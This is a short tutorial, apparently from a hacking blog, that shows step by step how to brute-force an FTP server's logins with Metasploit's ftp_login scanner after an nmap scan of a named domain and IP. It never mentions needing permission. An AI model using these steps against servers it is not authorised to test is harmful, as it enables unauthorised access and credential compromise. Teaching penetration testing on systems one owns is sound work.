Recent

Hack ftp server using metasploit in kali Linux

In most servers there is a common vulnerability that is an open ftp port.It can be exploited by bruteforcing it's username and password.This is exactly what we are going to do.We will exploit a webserver with an open ftp port.There are couple of things you need to do this:

first thing you need is Msfconsole,which is ofcourse pre-installed in Kali..Second thing you need is two wordlists .If you already have then it's good else you can create you own wordlist. So create 2 wordlists of usernames and passwords.Once you have it then we are good to go.

So open your terminal and start postgresql database :

root@seven:~# service postgresql start

Start Metasploit :

root@seven:~# msfconsole

First thing we need is to find ip address of your target and an open ftp port as well.So we will run a fast nmap scan to grab the both. You can run your nmap commands inside Msfconsole console so dont bother to open another terminal for nmap scan. Type the following command:

msf > nmap -F zeeroseven.com
[*] exec: nmap -F zeeroseven.com
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 
Nmap scan report for zeeroseven.com (192.186.251.160)
Host is up (0.43s latency).
rDNS record for 192.186.251.160: ip-192-186-251-160
Not shown: 88 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh

target

Now we have our target.We need to find our exploit.For this attack we will use ftp_login exploit.So type the following command to search the exploit:

msf > search ftp_login
Matching Modules
================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   auxiliary/scanner/ftp/ftp_login                   normal  FTP Authentication Scanner


msf > 

Above command will bring up ftp authentication scanner.We are going to use it.

Find out more information about ftp_login scanner with the below command.it will bring up the usage ,description and the options that you can use with this exploit.There are plenty but we hardly need 4 may be 6 options just go through all to find more information. .

msf > info auxiliary/scanner/ftp/ftp_login 

Use ftp_login exploit

Just write the below command to use exploit:

msf > use  auxiliary/scanner/ftp/ftp_login

Once you are inside ftp_login exploit type the below command to see how to set target.It might confuse you because there are a lot of options.We just need to use 4 of them.

msf auxiliary(ftp_login) > show options

options

Set your Target

now we need to set the option RHOST by giving ip address of your target.Just give the ip address of the website.

msf auxiliary(ftp_login) > set RHOSTS 192.186.251.160

remote host

Set threads it sets the speed or how much multiple processes you want to run at a time.

msf auxiliary(ftp_login) > set THREADS 40

set threads

Now here starts the real work.

Set the path of file usernames.This is where exploit will grab usernames to login.Give the right path in my case my wordlist is in desktop.

msf auxiliary(ftp_login) > set USER_FILE Desktop/usernames.txt

unMES

Now set the path of passwords list.

msf auxiliary(ftp_login) > set PASS_FILE Desktop/password.txt

password

Now everything is set.Run the exploit.Now it starts testing usernames and passwords if it finds username and password then it will stop testing and it displays the login sucessfull message along with username and password.

msf auxiliary(ftp_login) > exploit
msf auxiliary(ftp_login) > exploit
[*] 192.186.251.160:21 - Starting FTP login sweep
[-] 192.186.251.160:21 FTP - LOGIN FAILED: admin:adminarea (Incorrect: )

results

Another thing you can do is to use a single username .So instead of using a wordlist you can use some common usernames like root,admin etc.So it will take root as the username and will search for passwords from the wordlists.

msf auxiliary(ftp_login) > set USERNAME root

That's it for this tutorial do share if helped you.